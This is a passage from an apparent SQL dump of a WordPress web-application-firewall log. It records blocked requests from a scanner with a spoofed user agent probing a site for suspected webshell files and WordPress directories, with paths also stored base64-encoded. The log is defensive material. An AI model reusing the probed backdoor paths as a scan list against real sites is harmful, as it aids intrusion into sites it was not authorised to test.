User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NhY2hlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133276,1699888665.920838,1699888665.907000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.asf.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio-video.asf.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8uYXNmLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133275,1699888666.256545,1699888666.242000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.flv.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio-video.flv.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8uZmx2LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133271,1699888667.611575,1699888667.579500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.ac3.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio.ac3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8uYWMzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133270,1699888667.942774,1699888667.934100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.dts.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio.dts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8uZHRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133286,1699888658.272969,1699888658.264100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/site/wp-includes/','http://eckankar-colorado.org/site/wp-includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133264,1699888669.933507,1699888669.924700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.id3v2.php','http://eckankar-colorado.org/wp-includes/ID3/module.tag.id3v2.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmlkM3YyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133263,1699888670.263347,1699888670.254700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.lyrics3.php','http://eckankar-colorado.org/wp-includes/ID3/module.tag.lyrics3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmx5cmljczMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133580,1699888547.369289,1699888547.360600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/post-template.php','http://eckankar-colorado.org/wp-includes/post-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Bvc3QtdGVtcGxhdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133105,1699825269.933020,1699825269.924400,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/class.api.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzLmFwaS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133089,1699799823.936648,1699799823.914900,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133098,1699815362.901980,1699815362.880300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://www.eckankar-colorado.org/wp-includes/images/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133312,1699888649.263904,1699888649.254900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/widgets.php','http://eckankar-colorado.org/wp-admin/includes/widgets.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3dpZGdldHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133232,1699888683.917907,1699888683.909300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/owfsmac/','http://eckankar-colorado.org/wp-content/plugins/owfsmac/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9vd2ZzbWFjLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133212,1699888691.061186,1699888691.052300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-diambar/includes/','http://eckankar-colorado.org/wp-diambar/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWRpYW1iYXIvaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133403,1699888617.421518,1699888617.406400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-ftp.php','http://eckankar-colorado.org/wp-admin/includes/class-ftp.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWZ0cC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133404,1699888616.679754,1699888616.670800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-ftp-sockets.php','http://eckankar-colorado.org/wp-admin/includes/class-ftp-sockets.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWZ0cC1zb2NrZXRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133405,1699888616.341392,1699888616.326800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-ftp-pure.php','http://eckankar-colorado.org/wp-admin/includes/class-ftp-pure.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWZ0cC1wdXJlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133428,1699888606.634331,1699888606.625400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/','http://eckankar-colorado.org/wp-admin/user/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(133427,1699888607.279067,1699888607.270400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/','http://eckankar-colorado.org/wp-content/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(133424,1699888609.067670,1699888609.058900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/mu-plugins/wp-staging-optimizer.php','http://eckankar-colorado.org/wp-content/mu-plugins/wp-staging-optimizer.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy93cC1zdGFnaW5nLW9wdGltaXplci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133425,1699888608.292436,1699888608.283800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/','http://eckankar-colorado.org/wp-content/plugins/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133426,1699888607.954436,1699888607.945700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/elementor/','http://eckankar-colorado.org/wp-content/plugins/elementor/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3Iv\",\"category\":\"brute-force\",\"ssl\":1}'),(133423,1699888609.430721,1699888609.421900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/','http://eckankar-colorado.org/wp-content/themes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133422,1699888609.774147,1699888609.765500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/upload/image/','http://eckankar-colorado.org/upload/image/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133420,1699888610.510055,1699888610.501400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-content/uploads/','http://eckankar-colorado.org/wordpress/wp-content/uploads/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb250ZW50L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133421,1699888610.118479,1699888610.109900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/uploads/','http://eckankar-colorado.org/uploads/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 